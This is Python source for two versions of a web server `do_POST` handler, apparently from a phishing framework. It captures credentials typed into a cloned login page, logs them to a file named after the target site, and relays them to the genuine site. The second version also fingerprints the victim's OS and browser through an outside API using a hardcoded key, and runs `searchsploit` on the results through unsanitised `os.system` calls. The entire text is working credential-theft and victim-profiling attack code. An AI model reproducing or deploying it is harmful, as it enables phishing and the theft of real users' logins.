def do_POST(self):
post_request = []
printt(3, "%s - sent POST request." %self.address_string())
form = cgi.FieldStorage(self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],})
try:
from core.shell import url
logger = open("%s.log" %url.replace("https://", "").replace("http://", "").split("/")[0], "a")
logger.write("\n## Data for %s\n\n" %url)
for tag in form.list:
tmp = str(tag).split("(")[1]
key,value = tmp.replace(")", "").replace("\'", "").replace(",", "").split()
post_request.append("%s %s" %(key,value))
printt(2, "%s => %s" %(key,value))
logger.write("%s => %s\n" %(key,value))
logger.close()
from core.shell import action_url
create_post(url,action_url, post_request)
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
except socerr as e:
printt(3, "Something wrong: (%s) igonring ..." %str(e))
except Exception as e:
printt(3, "Something wrong: (%s) igonring ..." %str(e))
def do_POST(self):
#Setup redirect
os.system('cp redirect.html.orig redirect.html')
post_request = []
printt(3, "%s - sent POST request." %self.address_string())
form = cgi.FieldStorage(self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],})
try:
from core.shell import url
logger = open("%s.log" %url.replace("https://", "").replace("http://", "").split("/")[0], "a")
logger.write("\n## %s - Data for %s\n\n" %(time.strftime("%H:%M:%S - %d/%m/%y"), url))
## Get the User-Agent header and query useragentapi for json information regarding the browser
user_agent = urllib.quote_plus(self.headers['User-Agent'])
## UserAgentAPI Account registered for up to 1000 calls per day
## If more are needed register a new APIKEY
apikey = '8c21e71c'
r = requests.get('https://useragentapi.com/api/v3/json/'+apikey+'/'+user_agent)
printt(2, "Operating System: "+r.json()[u'data'][u'platform_name']+" "+r.json()[u'data'][u'platform_version'])
printt(2, "Browser: "+r.json()[u'data'][u'browser_name']+" "+r.json()[u'data'][u'browser_version'])
printt(2, "Platform: "+r.json()[u'data'][u'platform_type'])
# printt(2, "Rendering Engine: "+r.json()[u'data'][u'engine_name']+" "+r.json()[u'data'][u'engine_version'])
printt(2, "Potential Metasploit Modules:")
os.system('searchsploit '+r.json()[u'data'][u'platform_name']+' '+r.json()[u'data'][u'platform_version'])
os.system('searchsploit '+r.json()[u'data'][u'browser_name']+' '+r.json()[u'data'][u'browser_version'])
## Check HTTP_ACCEPT for Flash
if ('flash' in self.headers['Accept']) or ('flash' in self.headers['Accept']):
printt(2, "Flash found: "+self.headers['Accept'])
else:
printt(2, "Flash not found")
for tag in form.list:
tmp = str(tag).split("(")[1]
key,value = tmp.replace(")", "").replace("\'", "").replace(",", "").split()
post_request.append("%s %s" %(key,value))
printt(2, "%s => %s" %(key,value))
logger.write("%s => %s\n" %(key,value))
logger.close()
from core.shell import action_url
create_post(url,action_url, post_request)
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
except socerr as e:
printt(3, "%s igonring ..." %str(e))
except Exception as e:
printt(3, "%s igonring ..." %str(e))
